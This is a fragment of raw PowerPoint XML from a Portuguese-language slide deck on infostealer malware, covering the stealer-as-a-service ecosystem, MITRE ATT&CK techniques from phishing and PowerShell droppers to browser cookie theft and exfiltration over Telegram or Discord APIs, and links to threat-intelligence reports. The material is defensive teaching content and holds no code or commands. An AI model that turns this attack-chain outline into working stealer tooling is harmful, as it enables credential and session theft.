          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="3214838979" sldId="2147483660"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="2445954099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1439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E97B9-E6D4-51F0-0258-7D04D0462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990CEA-F7FE-434D-08D0-EBC99D07D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75DD3E-97EA-71FF-8F82-10459B41C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E825-41C1-D415-9EC6-ABE9DA5C85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89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A7EB9-B52F-9C47-FD80-D9824CA5E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67655-D4B3-CC58-76DD-5132A3032B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2D1B1-3DB5-730B-C9AB-4A3669A93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19072-6E0E-7197-A8D6-88D8789114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17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D3A4E-C7CF-54B7-3DF9-C76A91E2A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8CE349-06B2-ED02-79AC-1708CEDA4A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385352-75B1-D32D-8BC1-DFABECDB4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5CBBF-8CFE-2173-7E60-83D84D6F7F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95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A98D-77E9-5B38-5667-93E716E0C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30840-811B-3672-3A06-C3436F7F03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0264EC-C9C3-8ED9-F570-9A8CF4582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2A68C-FAF0-E15F-6021-974BBD6E35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22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95276-BC33-022E-40D3-316783B35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CA05E7-EC3B-DDAA-9534-E5057F662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D7F994-70FA-7810-4ACD-EEE4CE263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5165A-3754-F820-70CE-F4B2EEA2C9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3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45EF0-7D0E-FE4C-518B-2C6A50863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23211F-2CC8-BCD0-FE24-2D86F979E7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E70D55-96FC-C323-429F-7949BA4B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E7BC0-6B51-F93C-9FB2-019A1523DE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44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DC35F-974D-59AB-D8AD-2AEE24783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42C2F0-3A1D-0F89-634C-BEBFCE09F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AA5DC7-1FE1-C017-7CB8-6AA506CD9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1239A-FEF2-9D15-7541-8710386D9B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94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F3AD0-FD7D-B15E-5A48-45921D88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4BD98F-6C48-27DA-8EB3-6540EB368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F7A13-5496-6117-2E48-364BB3F41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4E3E2-80BD-D258-F496-95995A7CF8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12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7FCB1-FC70-C846-EFC5-C3E50F5B4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C1E5D3-8D1C-7909-3E53-F2B819C770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97229-4EBA-0C6B-699E-7CDB3F9D6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D8A60-82EE-6ADF-EDD9-2803676DB8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80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FFAA9-0D4B-CF98-0037-CC9E6347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95CB4F-523D-C98E-1777-80CC7354E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D02645-9D17-1729-6B62-D42C865A4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4EA0-2CDB-F56B-C00F-430056AFEA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90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F3296-4535-8487-D5EE-9C0352601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45A24C-1D30-98DA-2798-CBB8C9DFD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6F1A4-8E54-BFF6-60E0-D3D7918C0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69AB2-3726-47CF-6B56-E5E6C24DE1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84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A6DFC-64EF-C2E7-FF3D-A496EF90E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2EFA2-3545-BF6C-A08C-27EE8F09D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731BF-5572-BC79-5628-D851A43E4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8E0BA-800C-E51A-8483-B495E2B464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79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09A0C-EACE-421C-32E8-7F42ABDCD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3EA89C-4047-CC57-F860-B44B2ABD3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47A5A9-B369-F446-E65D-67918DF56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651AA-6D69-3F39-5E60-8FB4CF252F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3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EC965-3143-D7FB-2EA1-A6AD625B4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88B26E-8087-7C51-FAFA-8FEE1A42E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D247EE-9F6D-9FC9-F349-2BE143C0C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DB280-2AFD-045B-0F2D-5BDB5A0235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13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9E861-75E2-5B1C-A029-7554067F3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C4CF7D-D50A-7191-A20D-C4624C3397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6B7A26-550E-E77A-6902-3A426FA98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663D3-88CB-EC6B-4D37-E01B8A4F0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86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D0308-0DDF-8ABF-4E19-212310BB9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56EE1-0E29-2013-7F2A-607F44D2F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9AC7E8-943C-F0B6-E906-108C80142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A60D2-C5AD-8000-6140-A73A553E2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89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8D42A-A466-7A21-052D-5F92DB3CD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E384B-4421-30B4-3B26-843AAC5B43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C32F32-D36E-743C-2894-B8E9D4FBD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B3590-E412-610C-242E-672E33D06B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70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44EE6-FAFF-74B0-8772-6E4DF354B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F255E8-8E6D-A301-6A68-A13519C8B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3FC0B1-8AFD-6EEB-DCD2-77D9CC27A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C1950-7AB3-8282-35F0-CB1996D8E9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58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CFDB1-3BF4-6297-7B48-FCDABB418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706C41-608E-B937-1400-5A6AF7B14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D349FB-5D1D-7DF6-B5F8-BB8BE74FA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AA456-9749-2126-0A8E-F2B1414CF4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69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BF9BB-791B-B35C-6CAA-A6711CBC3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72207A-FF99-B7CC-C8A8-EA1B13E27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571357-72AE-6261-E32F-BD45E498C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0FD6E-EC44-65F8-D14C-69A224C759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04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3B51E-E965-44A5-CDF7-81550D12E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117BED-A057-BBAA-BEF3-46268E33D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C9336-22CA-2A79-B6EB-9464AD331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BC5F3-25B8-9B98-D9B5-7FE9CB04C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93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BB8A9-7D1C-90FD-5E73-269B7CA1D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F92DA5-8E65-0DA1-F6A1-544B5B1DAB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3C727A-2803-7C80-57DC-15EC799E3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41276-A666-7158-6CF3-8EE53BB4EB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62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FABBF-C312-76D0-7589-0B1558976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117855-2B71-5BB9-99D8-3C25B6382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8CAF61-3D15-B597-3CB7-25540E3BD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C0CAF-5158-01F2-D22C-E9DDF0D89D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452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FE447-EB76-55BD-4DB4-A1F13CBEB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6BC55-357B-B7CA-B3CD-0357F5BF8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DA0BFD-29F5-9DE5-18EE-C9E6305BE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205F1-1535-4B7B-6879-0398D05F91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8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5AE2E-CC45-19CA-11C1-03393F348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B8EBA3-4AEE-19CD-19CB-56764AC2C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AC6B51-A7AD-91E4-0B36-EA1D7E9AF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1DCFB-51D9-40C7-AC0C-DC489D14B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43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18450-C23E-3D36-290B-FB0510BCE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C2607C-D559-C31D-9294-30E656B6B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5CA52-2C05-F93D-F754-4ACBE9EE9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A96E1-F53F-FD02-2F92-8B0E2F5FC1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64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196EE-79BD-D29B-0B88-BDB908765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704CD1-80C1-05F2-E5C4-A04EC1DC6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9140B0-1499-C687-2357-9AA966E7D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F4E0D-516C-1E2F-E900-0811BB86BF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11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9F400-D782-04B4-9B9D-EFFB1D7CB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06034-4948-D2D6-FBB1-F84EBC2E8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0E88F-64DD-D0C4-C190-1466C5F48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98D2C-F680-FC52-1012-97A945DE96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83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22FF4-6742-FCE5-3991-5988595B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688C6C-8B87-03F6-8DAD-1E2EC31F56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68164D-DD14-4501-A331-42F2A94A7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87588-31C8-E636-DD9E-7273D760D2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84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2D2D6-F088-D714-4E17-2D12814B5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F9C1F9-B776-2D4F-9445-60CB3E3D4B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495491-8F21-4D08-DC18-CFBFFA8FE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F6CA1-835E-8588-8370-839C3290D9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8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07A750C-70E7-9C7D-6A32-CBB336A8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730250"/>
            <a:ext cx="21034375" cy="2651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3399"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>LUCAS LEMES</a:t>
            </a:r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EC6A369-9237-4171-A64A-3F9358D40E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24387175" cy="1371778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slow">
    <p:push dir="u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brverona.it/2023/05/26/initial-access-broker/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure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blog.sekoia.io/overview-of-the-russian-speaking-infostealer-ecosystem-the-logs/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lumma-stealer-on-the-rise-how-telegram-channels-are-fueling-malware-proliferation/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mte0/empyrean" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide31.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sciencedirect.com/science/article/pii/S2405959525001651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nnportugal.iol.pt/centro-nacional-de-ciberseguranca/roubo-de-dados/centro-nacional-de-ciberseguranca-alerta-para-os-infostealers-que-roubam-dados-sensiveis/20251104/690a5b1ad34e3caad84ae7fc" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://flashpoint.io/blog/understanding-seidr-infostealer-malware/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.cert.br/forum2025/slides/forumcsirts2025-kryptus.pdf" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forbes.com.br/forbes-tech/2025/10/como-se-proteger-dos-infostealers-os-espioes-digitais-por-tras-dos-vazamentos-de-gmail/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityleaders.com.br/infostealers-expoem-16-bilhoes-de-credenciais-em-novo-megavazamento-global/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bridewell.com/insights/blogs/detail/uncovering-the-easy-stealer-infostealer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3652500"/>
            <a:ext cx="24387048" cy="63500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Image 50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49381" y="4800600"/>
            <a:ext cx="10300987" cy="2781300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6515914" y="8496300"/>
            <a:ext cx="11355219" cy="54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600" kern="0" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Gotham HTF Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Gotham HTF Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Gotham HTF Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A MELHOR FACULDADE DE TECNOLOGIA DO BRASIL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"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3F3FCE-BCD6-588D-F591-8FF31A1CB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4CA1D368-F7FC-A325-D5A4-A33EA726F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521DE8F-076D-B472-E481-CF243C5B517E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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O ECOSSISTEMA “STEALER-AS-A-SERVICE”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859E7E6-476A-BC72-E480-D8059307D4E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19052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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 7" descr="Tela de computador com fundo preto&#10;&#10;O conteúdo gerado por IA pode estar incorreto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35036B09-376C-A751-9A2D-62373A6C7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237" y="3048000"/>
            <a:ext cx="20576699" cy="934953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29CD08F-227A-6095-45A5-425EA6F86D78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8225891" y="12434861"/>
            <a:ext cx="8762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2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Dashboard do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bandit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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BR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. Fonte: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CloudSEK</a:t>
            </a:r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387EAC3E-24DB-B009-F018-4F30F80BDE3F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064939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7C9841-5991-9786-B640-CCD68130D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46E53B55-7C2E-7EAA-E628-FB054F2AD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0D28490-365A-C5F2-46D0-5C8DFFA6D7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PRINCIPAIS TTPS UTILIZADAS(MITRE ATT&amp;CK)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083CD03-BC19-6015-6659-A288BB6DA04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19052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060FA87E-6B17-ADB8-3B2A-3F11FDCDB2F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057638" y="4533900"/>
            <a:ext cx="15353284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pt-BR" sz="48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T1566.002 – SPEARPHISHING LINK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T1059.001 – POWERSHELL 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T1547.001 – REGISTRY RUN KEYS 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T1003 – CREDENTIAL DUMPING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T1555.003 – CREDENTIALS FROM WEB BROWSERS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T1185 – BROWSER SESSION HIJACKING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T1071.001 – WEB PROTOCOLS</a:t>
            </a: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18C6A144-B2BF-DC78-97F6-C8AFB7425F4B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DAA3403A-5229-4695-5A13-65C58C609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8000" y="3886200"/>
            <a:ext cx="6810556" cy="920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528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2709D5-F481-66E3-E157-8C89FEFEE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5ADA7114-A0F6-7ECC-8536-90C6021F5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79C91E5-80F8-9863-6DC0-91801DF83920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="1504950"/>
            <a:ext cx="21404218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PRINCIPAIS TTPS UTILIZADAS – CHOKE POINTS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A24B3A1-A898-5BF9-6497-31BBA9EF5FD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19052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2BC48B6C-17A4-82F3-03B8-0BA941A0F754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057638" y="4533900"/>
            <a:ext cx="17331374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lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2B6C1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ETAPAS OBRIGATÓRIAS DO ATAQUE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POWERSHELL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PERSISTÊNCIA LOCAL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LEITURA DE ARQUIVOS PROTEGIDOS(NAVEGADORES)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DUMPING DE CREDENCIAIS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EXFILTRAÇÃO (API TELEGRAM/DISCORD)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02F8618F-1123-9AD4-070B-994AF5ABB922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224419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080CF0-4365-0262-5DF9-D5C5F3315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306D6BB9-15F8-1683-5025-68725D6F1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ADDB77F1-6C74-E7F5-14E2-4F78AF349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238" y="9118598"/>
            <a:ext cx="20576572" cy="25402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E3449D-134F-42B2-E71F-3FEC62781664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2032254" y="9029700"/>
            <a:ext cx="241330" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED145B">
              <a:alpha val="10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C8BE7A5E-213B-0299-0201-794519E0D613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049381" y="9029700"/>
            <a:ext cx="241330" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED145B">
              <a:alpha val="10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E75BE90F-933A-B7F3-5C40-B22EDB49FBDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11444130" y="9029700"/>
            <a:ext cx="241330" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED145B">
              <a:alpha val="10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984FC20A-2135-BBE0-2DA1-EEF28CC49E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16461257" y="9029700"/>
            <a:ext cx="241330" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED145B">
              <a:alpha val="10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D8FAEA24-EE1B-368A-BA84-4B01EDBD09C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22113464" y="9029700"/>
            <a:ext cx="241330" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED145B">
              <a:alpha val="10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1F53D55C-0969-E02E-5D11-5CDFC63EEF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="2921000"/>
            <a:ext cx="15804264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6300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A CADEIA DE ATAQUE SOB ÓTICA TTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="63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F5F1C779-0A7E-648A-F22C-52B7CAE1C1D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905238" y="9525000"/>
            <a:ext cx="4509064" cy="187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pt-BR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Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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: Campanhas de e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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são o vetor de entrega mais comum, frequentemente utilizando anexos que contêm scripts maliciosos ou arquivos autoexecutáveis.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill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9A0B6238-7ADC-D0C3-9548-8532309B410D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7049381" y="6553200"/>
            <a:ext cx="4204225" cy="2235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Command and Scripting Interpreter: Uso de scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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como</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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dentro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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documentos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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r>
              <a:rPr lang="en-US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ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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droppers para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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baixar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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executar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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a carga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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útil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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principal (o infostealer).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill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181F3909-8DEE-830C-9D6B-5E6314451369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11431429" y="9525000"/>
            <a:ext cx="4534467" cy="187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pt-BR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Registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Keys / Startup Folder: O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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infostealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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modifica chaves específicas no Registro do Windows (como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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RunOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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) para garantir que o malware seja executado automaticamente sempre que o sistema é iniciado.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/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4D8C1219-EBE4-4C51-0456-BFCC2AA5834B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16435049" y="6400800"/>
            <a:ext cx="4204225" cy="2235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pt-BR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Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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r>
              <a:rPr lang="pt-BR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Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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: Esta é uma técnica específica do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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infostealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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. O malware visa e rouba cookies de sessão e tokens de autenticação armazenados pelos navegadores.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr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B1B5B16C-4D37-2B35-3068-0FCC1233CB00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19502353" y="9393553"/>
            <a:ext cx="3772371" cy="2590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pt-BR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Exfiltration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Alternative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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r>
              <a:rPr lang="pt-BR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Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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: Uso de protocolos ou serviços não convencionais para o envio. Muitos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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infostealers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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modernos, como o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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RedLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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e suas variantes, utilizam APIs de serviços de mensagens legítimos como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Telegram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Discord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A2B6C1"/>
              </a:solidFill>
            </a:endParaRPr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02744B09-91C3-FDF0-B449-AD244A02FA1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249984" y="8716434"/>
            <a:ext cx="1805870" cy="372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500" kern="0" spc="75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgb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T1566</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="250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0A371DF8-BABF-55C3-9A27-8D03FF3AEB6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6686450" y="9372084"/>
            <a:ext cx="1208522" cy="372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500" kern="0" spc="75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgb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T1059</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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CA97C191-59AB-0D4D-E20B-99FAAF66F490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10834586" y="8716434"/>
            <a:ext cx="1460417" cy="304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500" kern="0" spc="75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgb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T1547</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0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694A52D0-182A-7170-A043-FA6C293490F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15977661" y="9367072"/>
            <a:ext cx="1208522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500" kern="0" spc="75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgb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T1185</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0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6D711487-A035-4326-70A2-43A517B3ECA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21478384" y="8737598"/>
            <a:ext cx="1460416" cy="372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500" kern="0" spc="75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ED145B">
                    <a:alpha val="100000"/>
                  </a:srgb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T1048</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
